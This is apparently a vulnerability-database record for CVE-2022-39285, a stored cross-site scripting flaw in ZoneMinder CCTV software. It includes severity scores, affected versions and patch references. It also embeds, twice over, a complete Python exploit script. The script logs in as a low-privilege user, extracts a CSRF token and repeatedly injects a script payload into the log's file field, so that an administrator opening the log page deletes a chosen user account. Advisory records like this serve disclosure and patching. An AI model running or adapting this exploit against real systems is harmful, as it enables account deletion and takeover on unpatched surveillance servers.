VAR-202210-0307
Vulnerability from variot - Updated: 2025-01-30 21:28ZoneMinder is a free, open source Closed-circuit television software application The file parameter is vulnerable to a cross site scripting vulnerability (XSS) by backing out of the current "tr" "td" brackets. This then allows a malicious user to provide code that will execute when a user views the specific log on the "view=log" page. This vulnerability allows an attacker to store code within the logs that will be executed when loaded by a legitimate user. These actions will be performed with the permission of the victim. This could lead to data loss and/or further exploitation including account takeover. This issue has been addressed in versions 1.36.27 and 1.37.24. Users are advised to upgrade. Users unable to upgrade should disable database logging. ZoneMinder Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. # Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS)
Date: 10/01/2022
Exploit Author: Trenches of IT
Vendor Homepage: https://github.com/ZoneMinder/zoneminder
Version: v1.36.26
Tested on: Linux/Windows
CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291
Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/
Proof of Concept:
1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)
2 - Admin user logs navigates to http:///zm/index.php?view=log
3 - XSS executes delete function on target UID (user).
import requests import re import time import argparse import sys
def getOptions(args=sys.argv[1:]): parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1") parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4", required=True) parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80", required=True) parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv", required=True) parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv", required=True) parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7", required=True) options = parser.parse_args(args) return options
options = getOptions(sys.argv[1:])
payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F<script src='/zm/index.php?view=options&tab=users&action=delete&markUids[]=" + options.deleteUser + "&deleteBtn=Delete'"
Request to login and get the response headers
loginUrl = "http://" + options.ip + ":" + options.port + "/zm/index.php?action=login&view=login&username="+options.username+"&password="+options.password loginCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": "f1neru6bq6bfddl7snpjqo6ss2"} loginHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=login", "Upgrade-Insecure-Requests": "1"} response = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies) zmHeaders = response.headers try: zoneminderSession = re.findall(r'ZMSESSID\=\w+\;', str(zmHeaders)) finalSession = zoneminderSession[-1].replace('ZMSESSID=', '').strip(';') except: print("[ERROR] Ensure the provided username and password is correct.") sys.exit(1) print("Collected the low privilege user session token: "+finalSession)
Request using response headers to obtain CSRF value
csrfUrl = "http://"+options.ip+":"+options.port+"/zm/index.php?view=filter" csrfCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": '"' + finalSession + '"'} csrfHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=montagereview&fit=1&minTime=2022-09-30T20:52:58&maxTime=2022-09-30T21:22:58¤t=2022-09-30%2021:07:58&displayinterval=1000&live=0&scale=1&speed=1", "Upgrade-Insecure-Requests": "1"} response = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies) zmBody = response.text extractedCsrfKey = re.findall(r'csrfMagicToken\s\=\s\"key\:\w+\,\d+', str(zmBody)) finalCsrfKey = extractedCsrfKey[0].replace('csrfMagicToken = "', '') print("Collected the CSRF key for the log injection request: "+finalCsrfKey) print("Navigate here with an admin user: http://"+options.ip+"/zm/index.php?view=log")
while True:
#XSS Request
xssUrl = "http://"+options.ip+"/zm/index.php"
xssCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": finalSession}
xssHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=filter"}
xssData = {"__csrf_magic": finalCsrfKey , "view": "request", "request": "log", "task": "create", "level": "ERR", "message": "Trenches%20of%20IT%20PoC", "browser[name]": "Firefox", "browser[version]": "91.0", "browser[platform]": "UNIX", "file": payload, "line": "105"}
response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)
print("Injecting payload: " + response.text)
time.sleep(1)
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202210-0307",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.36.27"
},
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.24"
},
{
"model": "zoneminder",
"scope": "gt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.0"
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.37.0 greater than 1.37.24"
},
{
"model": "zoneminder",
"scope": null,
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.36.27"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018651"
},
{
"db": "NVD",
"id": "CVE-2022-39285"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Trenches Of IT",
"sources": [
{
"db": "PACKETSTORM",
"id": "171498"
}
],
"trust": 0.1
},
"cve": "CVE-2022-39285",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"id": "CVE-2022-39285",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "HIGH",
"baseScore": 7.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.1,
"id": "CVE-2022-39285",
"impactScore": 5.5,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2022-39285",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-39285",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2022-39285",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2022-39285",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202210-333",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018651"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-333"
},
{
"db": "NVD",
"id": "CVE-2022-39285"
},
{
"db": "NVD",
"id": "CVE-2022-39285"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder is a free, open source Closed-circuit television software application The file parameter is vulnerable to a cross site scripting vulnerability (XSS) by backing out of the current \"tr\" \"td\" brackets. This then allows a malicious user to provide code that will execute when a user views the specific log on the \"view=log\" page. This vulnerability allows an attacker to store code within the logs that will be executed when loaded by a legitimate user. These actions will be performed with the permission of the victim. This could lead to data loss and/or further exploitation including account takeover. This issue has been addressed in versions `1.36.27` and `1.37.24`. Users are advised to upgrade. Users unable to upgrade should disable database logging. ZoneMinder Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. # Exploit Title: Zoneminder v1.36.26 - Log Injection -\u003e CSRF Bypass -\u003e Stored Cross-Site Scripting (XSS)\n# Date: 10/01/2022\n# Exploit Author: Trenches of IT\n# Vendor Homepage: https://github.com/ZoneMinder/zoneminder\n# Version: v1.36.26\n# Tested on: Linux/Windows\n# CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 \n# Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/\n#\n# Proof of Concept:\n# 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)\n# 2 - Admin user logs navigates to http://\u003ctarget\u003e/zm/index.php?view=log\n# 3 - XSS executes delete function on target UID (user). \n\nimport requests\nimport re\nimport time\nimport argparse\nimport sys\n\ndef getOptions(args=sys.argv[1:]):\n parser = argparse.ArgumentParser(description=\"Trenches of IT Zoneminder Exploit PoC\", epilog=\"Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1\")\n parser.add_argument(\"-i\", \"--ip\", help=\"Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4\", required=True)\n parser.add_argument(\"-p\", \"--port\", help=\"Provide the port of the target zoneminder server. (Example: -p 80\", required=True)\n parser.add_argument(\"-zU\", \"--username\", help=\"Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv\", required=True)\n parser.add_argument(\"-zP\", \"--password\", help=\"Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv\", required=True)\n parser.add_argument(\"-d\", \"--deleteUser\", help=\"Provide the target user UID to delete from the target zoneminder server. (Example: -d 7\", required=True)\n options = parser.parse_args(args)\n return options\n\noptions = getOptions(sys.argv[1:])\n\npayload = \"http%3A%2F%2F\" + options.ip + \"%2Fzm%2F\u003c/td\u003e\u003c/tr\u003e\u003cscript src=\u0027/zm/index.php?view=options\u0026tab=users\u0026action=delete\u0026markUids[]=\" + options.deleteUser + \"\u0026deleteBtn=Delete\u0027\u003c/script\u003e\"\n\n#Request to login and get the response headers\nloginUrl = \"http://\" + options.ip + \":\" + options.port + \"/zm/index.php?action=login\u0026view=login\u0026username=\"+options.username+\"\u0026password=\"+options.password\nloginCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": \"f1neru6bq6bfddl7snpjqo6ss2\"}\nloginHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Origin\": \"http://\"+options.ip, \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=login\", \"Upgrade-Insecure-Requests\": \"1\"}\nresponse = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies)\nzmHeaders = response.headers\ntry:\n zoneminderSession = re.findall(r\u0027ZMSESSID\\=\\w+\\;\u0027, str(zmHeaders))\n finalSession = zoneminderSession[-1].replace(\u0027ZMSESSID=\u0027, \u0027\u0027).strip(\u0027;\u0027)\nexcept:\n print(\"[ERROR] Ensure the provided username and password is correct.\")\n sys.exit(1)\nprint(\"Collected the low privilege user session token: \"+finalSession)\n\n#Request using response headers to obtain CSRF value\ncsrfUrl = \"http://\"+options.ip+\":\"+options.port+\"/zm/index.php?view=filter\"\ncsrfCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": \u0027\"\u0027 + finalSession + \u0027\"\u0027}\ncsrfHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=montagereview\u0026fit=1\u0026minTime=2022-09-30T20:52:58\u0026maxTime=2022-09-30T21:22:58\u0026current=2022-09-30%2021:07:58\u0026displayinterval=1000\u0026live=0\u0026scale=1\u0026speed=1\", \"Upgrade-Insecure-Requests\": \"1\"}\nresponse = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies)\nzmBody = response.text\nextractedCsrfKey = re.findall(r\u0027csrfMagicToken\\s\\=\\s\\\"key\\:\\w+\\,\\d+\u0027, str(zmBody))\nfinalCsrfKey = extractedCsrfKey[0].replace(\u0027csrfMagicToken = \"\u0027, \u0027\u0027)\nprint(\"Collected the CSRF key for the log injection request: \"+finalCsrfKey)\nprint(\"Navigate here with an admin user: http://\"+options.ip+\"/zm/index.php?view=log\")\n\nwhile True:\n \n #XSS Request\n xssUrl = \"http://\"+options.ip+\"/zm/index.php\"\n xssCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": finalSession}\n xssHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"application/json, text/javascript, */*; q=0.01\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\", \"X-Requested-With\": \"XMLHttpRequest\", \"Origin\": \"http://\"+options.ip, \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=filter\"}\n xssData = {\"__csrf_magic\": finalCsrfKey , \"view\": \"request\", \"request\": \"log\", \"task\": \"create\", \"level\": \"ERR\", \"message\": \"Trenches%20of%20IT%20PoC\", \"browser[name]\": \"Firefox\", \"browser[version]\": \"91.0\", \"browser[platform]\": \"UNIX\", \"file\": payload, \"line\": \"105\"} \n response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)\n print(\"Injecting payload: \" + response.text)\n\n time.sleep(1)\n \n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-39285"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018651"
},
{
"db": "PACKETSTORM",
"id": "171498"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-39285",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "171498",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018651",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202210-333",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018651"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-333"
},
{
"db": "NVD",
"id": "CVE-2022-39285"
}
]
},
"id": "VAR-202210-0307",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T21:28:02.358000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "ZoneMinder Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=209972"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-333"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
},
{
"problemtype": "Cross-site scripting (CWE-79) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018651"
},
{
"db": "NVD",
"id": "CVE-2022-39285"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/171498/zoneminder-log-injection-xss-cross-site-request-forgery.html"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/c0a4c05e84eea0f6ccf7169c014efe5422c9ba0d"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/d289eb48601a76e34feea3c1683955337b1fae59"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/security/advisories/ghsa-h6xp-cvwv-q433"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39285"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-39285/"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=log\")"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=montagereview\u0026fit=1\u0026mintime=2022-09-30t20:52:58\u0026maxtime=2022-09-30t21:22:58\u0026current=2022-09-30%2021:07:58\u0026displayinterval=1000\u0026live=0\u0026scale=1\u0026speed=1\","
},
{
"trust": 0.1,
"url": "https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=login\","
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39290"
},
{
"trust": 0.1,
"url": "https://github.com/zoneminder/zoneminder"
},
{
"trust": 0.1,
"url": "http://\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=filter\"}"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\":\"+options.port+\"/zm/index.php?view=filter\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39291"
},
{
"trust": 0.1,
"url": "http://\u003ctarget\u003e/zm/index.php?view=log"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018651"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-333"
},
{
"db": "NVD",
"id": "CVE-2022-39285"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018651"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-333"
},
{
"db": "NVD",
"id": "CVE-2022-39285"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-018651"
},
{
"date": "2023-03-27T14:54:04",
"db": "PACKETSTORM",
"id": "171498"
},
{
"date": "2022-10-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-333"
},
{
"date": "2022-10-07T21:15:11.397000",
"db": "NVD",
"id": "CVE-2022-39285"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-20T08:27:00",
"db": "JVNDB",
"id": "JVNDB-2022-018651"
},
{
"date": "2023-03-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-333"
},
{
"date": "2023-03-27T18:15:11.557000",
"db": "NVD",
"id": "CVE-2022-39285"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-333"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder\u00a0 Cross-site scripting vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018651"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-333"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
